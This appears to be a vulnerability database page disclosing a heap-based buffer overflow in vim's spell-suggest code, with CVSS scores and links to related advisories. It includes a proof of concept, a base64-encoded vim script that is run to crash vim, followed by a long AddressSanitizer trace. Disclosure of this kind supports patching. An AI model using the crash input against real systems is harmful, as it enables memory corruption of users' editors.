Lucene search
Alkyne9E4DE32F-AD5F-4830-B3AE-9467B5AB90A1HistoryMar 12, 2022 - 3:45 p.m.
Heap-based Buffer Overflow occurs in vim
2022-03-1215:45:57
alkyne
www.huntr.dev
12
7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
4.6 Medium
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:L/AC:L/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
17.1%
Description
Heap-based Buffer Overflow occurs in suggest_try_change().
commit : d0b7bfa95798f5ec743d8afffbffb83aeac823da
Proof of Concept
$ echo -ne "c2UgZW5jb2Rpbmc9aXNvODg1OQpub3JtMFIwMDAwMDAwMDAwMApzaWwwbm9ybRYwCmZ1IFIoKQpz
aWwhbm9ybRZpMDAwMDApCmNhbCBSKCkKbm9ybTF6PQplbmRmCmNhbCBSKCk=" | base64 -d > poc
$ ASAN
$ ./src/vim -u NONE -i NONE -n -X -Z -e -m -s -S poc -c ":qa!"
=================================================================
==127228==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6120000212f8 at pc 0x000000430f36 bp 0x7ffd494cbe70 sp 0x7ffd494cb630
READ of size 1 at 0x6120000212f8 thread T0
#0 0x430f35 in strlen (/home/alkyne/vim-debug/src/vim.asan+0x430f35)
#1 0xbb0404 in suggest_try_change /home/alkyne/vim-debug/src/spellsuggest.c:1188:42
#2 0xbaa268 in spell_suggest_intern /home/alkyne/vim-debug/src/spellsuggest.c:1004:5
#3 0xba6e13 in spell_find_suggest /home/alkyne/vim-debug/src/spellsuggest.c:879:6
#4 0xba37da in spell_suggest /home/alkyne/vim-debug/src/spellsuggest.c:550:5
#5 0x922c10 in nv_zet /home/alkyne/vim-debug/src/normal.c:2998:7
#6 0x8f406d in normal_cmd /home/alkyne/vim-debug/src/normal.c:930:5
#7 0x6f763d in exec_normal /home/alkyne/vim-debug/src/ex_docmd.c:8670:6
#8 0x6f7243 in exec_normal_cmd /home/alkyne/vim-debug/src/ex_docmd.c:8633:5
#9 0x6f6fa3 in ex_normal /home/alkyne/vim-debug/src/ex_docmd.c:8551:6
#10 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#11 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#12 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#13 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#14 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#15 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#16 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#17 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#18 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#19 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#20 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#21 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#22 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#23 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#24 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#25 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#26 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#27 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#28 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#29 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#30 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#31 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#32 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#33 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#34 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#35 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#36 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#37 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#38 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#39 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#40 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#41 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#42 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#43 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#44 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#45 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#46 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#47 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#48 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#49 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#50 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#51 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#52 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#53 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#54 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#55 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#56 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#57 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#58 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#59 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#60 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#61 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#62 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#63 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#64 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#65 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#66 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#67 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#68 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#69 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#70 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#71 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#72 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#73 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#74 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#75 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#76 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#77 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#78 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#79 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#80 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#81 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#82 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#83 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#84 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#85 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#86 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#87 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#88 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#89 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#90 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#91 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#92 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#93 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#94 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#95 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#96 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#97 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#98 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#99 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#100 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#101 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#102 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#103 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#104 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#105 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#106 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#107 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#108 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#109 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#110 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#111 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#112 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#113 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#114 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#115 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#116 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#117 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#118 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#119 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#120 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#121 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#122 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#123 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#124 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#125 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#126 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#127 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#128 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#129 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#130 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#131 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#132 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#133 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#134 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#135 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#136 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#137 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#138 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#139 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#140 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#141 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#142 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#143 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#144 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#145 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#146 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#147 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#148 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#149 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#150 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#151 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#152 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#153 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#154 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#155 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#156 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#157 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#158 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#159 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#160 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#161 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#162 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#163 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#164 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#165 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#166 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#167 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#168 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#169 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#170 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#171 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#172 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#173 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#174 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#175 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#176 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#177 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#178 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#179 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#180 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#181 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#182 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#183 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#184 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#185 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#186 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#187 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#188 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#189 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#190 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#191 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#192 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#193 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#194 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#195 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#196 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#197 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#198 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#199 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#200 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#201 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#202 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#203 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#204 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#205 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#206 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#207 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#208 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#209 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#210 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#211 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#212 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#213 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#214 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#215 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#216 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#217 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#218 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#219 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#220 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#221 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#222 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#223 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#224 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#225 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#226 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#227 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#228 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#229 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#230 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#231 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#232 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#233 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#234 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#235 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#236 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#237 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#238 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#239 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#240 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#241 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#242 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#243 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#244 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#245 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#246 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#247 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#248 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#249 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#250 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
0x6120000212f8 is located 0 bytes to the right of 312-byte region [0x6120000211c0,0x6120000212f8)
allocated by thread T0 here:
#0 0x499c8d in malloc (/home/alkyne/vim-debug/src/vim.asan+0x499c8d)
#1 0x4cb0e0 in lalloc /home/alkyne/vim-debug/src/alloc.c:248:11
#2 0x4cb039 in alloc /home/alkyne/vim-debug/src/alloc.c:151:12
#3 0xbca715 in vim_strsave /home/alkyne/vim-debug/src/strings.c:27:9
#4 0xba364f in spell_suggest /home/alkyne/vim-debug/src/spellsuggest.c:540:12
#5 0x922c10 in nv_zet /home/alkyne/vim-debug/src/normal.c:2998:7
#6 0x8f406d in normal_cmd /home/alkyne/vim-debug/src/normal.c:930:5
#7 0x6f763d in exec_normal /home/alkyne/vim-debug/src/ex_docmd.c:8670:6
#8 0x6f7243 in exec_normal_cmd /home/alkyne/vim-debug/src/ex_docmd.c:8633:5
#9 0x6f6fa3 in ex_normal /home/alkyne/vim-debug/src/ex_docmd.c:8551:6
#10 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#11 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#12 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#13 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#14 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#15 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#16 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#17 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#18 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#19 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#20 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#21 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#22 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
#23 0xd09fee in ex_call /home/alkyne/vim-debug/src/userfunc.c:5458:6
#24 0x6d3442 in do_one_cmd /home/alkyne/vim-debug/src/ex_docmd.c:2567:2
#25 0x6c71d2 in do_cmdline /home/alkyne/vim-debug/src/ex_docmd.c:993:17
#26 0xcf0fd2 in call_user_func /home/alkyne/vim-debug/src/userfunc.c:2844:2
#27 0xcee0b6 in call_user_func_check /home/alkyne/vim-debug/src/userfunc.c:2992:2
#28 0xcea762 in call_func /home/alkyne/vim-debug/src/userfunc.c:3558:11
#29 0xce8ae4 in get_func_tv /home/alkyne/vim-debug/src/userfunc.c:1787:8
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/alkyne/vim-debug/src/vim.asan+0x430f35) in strlen
Shadow bytes around the buggy address:
0x0c247fffc200: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c247fffc210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c247fffc220: 00 00 00 00 00 00 00 00 00 01 fa fa fa fa fa fa
0x0c247fffc230: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c247fffc240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c247fffc250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]
0x0c247fffc260: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fffc270: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fffc280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fffc290: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fffc2a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==127228==ABORTING
Impact
This vulnerability is capable of exploiting the binary.
Related
nessus
nessus
EulerOS Virtualization 2.10.0 : vim (EulerOS-SA-2022-2079)
2022-07-14 00:00:00
EulerOS Virtualization 2.10.1 : vim (EulerOS-SA-2022-2085)
2022-07-15 00:00:00
EulerOS 2.0 SP10 : vim (EulerOS-SA-2022-1822)
2022-06-13 00:00:00
cnvd
cnvd
Vim has an unspecified vulnerability (CNVD-2022-20153)
2022-03-16 00:00:00
openvas
openvas
Huawei EulerOS: Security Advisory for vim (EulerOS-SA-2022-2079)
2022-07-14 00:00:00
Huawei EulerOS: Security Advisory for vim (EulerOS-SA-2022-1832)
2022-06-14 00:00:00
Fedora: Security Advisory for vim (FEDORA-2022-b718ebbfce)
2022-03-29 00:00:00
cbl_mariner
cbl_mariner
CVE-2022-0943 affecting package vim 8.2.4233-1
2022-04-26 20:17:05
CVE-2022-0943 affecting package vim 8.2.4495-1
2022-04-07 06:04:05
alpinelinux
alpinelinux
CVE-2022-0943
2022-03-14 21:15:00
osv
osv
CVE-2022-0943
2022-03-14 21:15:00
Moderate: vim security update
2022-07-01 00:00:00
vim vulnerabilities
2022-09-15 11:04:50
prion
prion
Heap overflow
2022-03-14 21:15:00
ubuntucve
ubuntucve
